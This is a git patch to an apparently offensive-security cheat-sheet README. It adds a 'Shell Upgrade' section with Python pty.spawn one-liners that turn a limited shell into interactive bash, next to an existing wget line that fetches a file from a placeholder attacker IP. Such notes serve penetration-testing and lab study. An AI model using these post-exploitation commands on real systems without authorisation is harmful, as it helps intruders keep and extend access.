From 747e05a558eabee235c0a1aaa434945a1028fe1f Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 3 Aug 2022 14:43:31 -0400 Subject: [PATCH] Update README.md --- README.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/README.md b/README.md index a2629ae..a068361 100644 --- a/README.md +++ b/README.md @@ -376,5 +376,20 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE} ## Windows +# Shell Upgrade +
+## Python + +
+ +```bash +# About: A command spawn a new shell using python +# Download: MAy or may not be installed on server machine + +# Usage +python3 -c 'import pty;pty.spawn("/bin/bash")' + +python -c 'import pty;pty.spawn("/bin/bash")' +```